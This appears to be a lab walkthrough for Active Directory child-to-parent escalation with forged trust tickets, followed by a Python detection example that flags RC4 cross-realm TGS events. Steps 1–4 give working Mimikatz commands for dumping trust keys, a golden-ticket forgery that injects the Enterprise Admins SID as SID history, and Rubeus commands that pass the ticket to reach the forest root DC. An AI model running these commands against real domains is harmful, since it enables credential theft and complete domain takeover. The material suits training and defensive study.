Using Trust Tickets

Child to Parent using Trust Tickets

We will extract the trust key and then forge an inter-realm TGT in which we inject the SID of the parent domain's Enterprise Admins group as SID History.

  1. To extract the trust key, look for the [In] trust key from the child to the parent.

Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dcorp-dc

OR use DCSync to extract it:

Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\mcorp$"'

OR extract all the secrets from the DC:

Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

  2. Now we can forge the inter-realm TGT using the trust key obtained. Note: unless explicitly enabled, AES is not supported across trusts (within or across forests); RC4 is.

C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /rc4:e9ab2e57f6397c19b62476e98e9521ac /service:krbtgt /target:moneycorp.local /ticket:C:\AD\Tools\trust_tkt.kirbi" "exit"

| Option | Description |
| --- | --- |
| kerberos::golden | The mimikatz module |
| /domain | FQDN of the current domain |
| /sid | SID of the current domain |
| /sids | SID of the Enterprise Admins group of the parent domain |
| /rc4 | RC4 of the trust key |
| /user | User to impersonate |
| /service | Target service in the parent domain |
| /target | FQDN of the parent domain |
| /ticket | Path where the ticket is to be saved (e.g., C:\AD\Tools\trust_tkt.kirbi) |

  3. Now we can request a TGS from the parent DC to access a service (CIFS) on the parent (forest root) DC.

Rubeus.exe asktgs /ticket:C:\AD\Tools\trust_tkt.kirbi /service:cifs/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt

  4. We can now access the forest root DC.

ls \\mcorp-dc.moneycorp.local\c$
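From the defender's side, the step above lands on the parent DC as a TGS request (Event ID 4769) for a child-realm principal whose ticket is RC4-encrypted (etype 0x17), because the forged inter-realm TGT was built from the RC4 trust key. The following is an added detection example (not from the original notes): it assumes 4769 records exported as JSON with Windows field names, uses the realm names from this page, and runs over constructed sample records.

```python
import json

# Constructed sample 4769 records as seen on the parent (moneycorp.local) DC.
# Field names mirror the Windows Security log XML fields; the values are made up.
SAMPLE_4769 = """
{"EventID":4769,"TargetUserName":"svc_web@MONEYCORP.LOCAL","TargetDomainName":"MONEYCORP.LOCAL","ServiceName":"MCORP-DC$","TicketEncryptionType":"0x12","IpAddress":"172.16.1.50"}
{"EventID":4769,"TargetUserName":"Administrator@DOLLARCORP.MONEYCORP.LOCAL","TargetDomainName":"DOLLARCORP.MONEYCORP.LOCAL","ServiceName":"MCORP-DC$","TicketEncryptionType":"0x17","IpAddress":"172.16.2.10"}
{"EventID":4769,"TargetUserName":"jdoe@DOLLARCORP.MONEYCORP.LOCAL","TargetDomainName":"DOLLARCORP.MONEYCORP.LOCAL","ServiceName":"FILESRV$","TicketEncryptionType":"0x12","IpAddress":"172.16.2.33"}
"""

LOCAL_REALM = "MONEYCORP.LOCAL"   # realm of the DC whose log we are reading
RC4_HMAC = "0x17"                 # etype produced by a /rc4 trust-key forgery
BUILTIN_ADMIN = "administrator"   # name impersonated in the walkthrough above


def load_events(text):
    """Parse one JSON record per line, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def is_cross_realm(realm):
    """True when the principal's realm is not the realm that issued the TGS."""
    return realm.upper() != LOCAL_REALM


def flag_rc4_cross_realm_tgs(records):
    """Return 4769 events where a trusted-realm principal obtained an RC4 ticket.

    Legitimate cross-realm traffic uses AES once the trust is AES-enabled, so an
    RC4 ticket for a principal referred from a child or trusted realm is worth
    triage; a built-in admin name raises the severity.
    """
    hits = []
    for rec in records:
        if rec.get("EventID") != 4769:
            continue
        if not is_cross_realm(rec["TargetDomainName"]):
            continue
        if rec["TicketEncryptionType"].lower() != RC4_HMAC:
            continue
        user = rec["TargetUserName"]
        severity = "high" if user.split("@")[0].lower() == BUILTIN_ADMIN else "medium"
        hits.append({"user": user, "realm": rec["TargetDomainName"],
                     "service": rec["ServiceName"], "src": rec["IpAddress"],
                     "severity": severity})
    return hits


if __name__ == "__main__":
    for hit in flag_rc4_cross_realm_tgs(load_events(SAMPLE_4769)):
        print(hit)
```

Baseline first: a trust that has never had AES enabled will produce RC4 cross-realm tickets legitimately, so the rule is only sharp once AES is turned on for the trust.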
